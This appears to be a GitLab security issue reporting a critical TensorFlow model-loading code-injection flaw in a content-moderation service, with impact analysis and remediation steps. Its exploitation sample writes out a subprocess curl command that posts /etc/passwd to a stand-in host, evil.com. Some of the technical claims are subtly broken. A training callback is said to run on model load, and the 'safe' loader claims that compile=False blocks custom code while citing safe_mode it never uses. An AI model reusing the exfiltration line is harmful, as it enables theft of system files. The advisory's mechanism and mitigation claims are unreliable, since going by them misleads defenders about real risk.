Skip to content
Launch GitLab Knowledge Graph

🚨 CRITICAL: TensorFlow CVE-2024-77777 - Code injection in model loading

🔴 CRITICAL SECURITY VULNERABILITY

CVE Details

  • CVE ID: CVE-2024-77777
  • Severity: CRITICAL (CVSS 9.8)
  • Package: tensorflow==2.10.0
  • Vulnerability: Code injection via malicious SavedModel
  • Attack Vector: Network, No authentication required
  • Impact: Remote Code Execution (RCE)

Affected Code

File: models/toxicity_classifier.py:34-38

import tensorflow as tf

def load_toxicity_model():
    # ⚠️ VULNERABLE: TensorFlow 2.10.0 has known RCE
    model = tf.keras.models.load_model('models/toxicity_v2.h5')  # VULNERABLE!
    return model

Vulnerability Details

TensorFlow 2.10.0 contains a critical vulnerability in the SavedModel loader:

  • Lambda layers can execute arbitrary Python code
  • Custom objects not properly sandboxed
  • Malicious models can execute system commands

Exploitation

Attacker creates malicious model:

import tensorflow as tf
import subprocess

class MaliciousCallback(tf.keras.callbacks.Callback):
    def on_train_begin(self, logs=None):
        # Executed when model is loaded!
        subprocess.run(['curl', 'evil.com/exfil', '--data', '@/etc/passwd'])

model = tf.keras.Sequential([...])
model.save('malicious_model.h5')

When our service loads this model → attacker code executes!

Impact Assessment

Affected Systems:

  • Content moderation API (12 instances)
  • Batch moderation jobs
  • Model training pipeline
  • A/B testing service

Data at Risk:

  • 450K flagged content samples
  • User reports (PII)
  • Model weights
  • API credentials

Business Impact:

  • Safety: Cannot moderate toxic content → platform safety at risk
  • Legal: Must report data breach within 72h (GDPR)
  • Revenue: $30K/day content moderation SLA penalties

Remediation

Immediate (TODAY)

  1. Upgrade TensorFlow
pip install tensorflow==2.15.1  # Patched version
  1. Audit existing models
find models/ -name '*.h5' -mtime -30 | xargs md5sum
# Compare against known-good checksums
  1. Disable model uploads until fixed

Short-term (Week 1)

import tensorflow as tf

def load_model_safe(model_path):
    # ✅ SAFE: Use safe_mode and whitelist custom objects
    custom_objects = {'CustomMetric': CustomMetric}  # Whitelist
    
    model = tf.keras.models.load_model(
        model_path,
        custom_objects=custom_objects,
        compile=False  # Don't execute custom code
    )
    return model

Long-term (Week 2-3)

  1. Model signing: Verify model provenance with digital signatures
  2. Sandboxing: Load models in restricted containers
  3. Model scanning: Automated security scanning for suspicious patterns

Related Issues

Testing

# Verify patched version
python -c "import tensorflow as tf; print(tf.__version__)"
# Should print: 2.15.1

# Run security tests
pytest tests/security/test_model_loading.py

Acceptance Criteria

  • Upgrade TensorFlow to 2.15.1 across all environments
  • Add model integrity verification
  • Implement safe model loading with whitelisted custom objects
  • Security team pen test
  • Update incident response runbook

PRIORITY: P0 - Production deployment blocked

cc: @sabrina @bill_staples @bob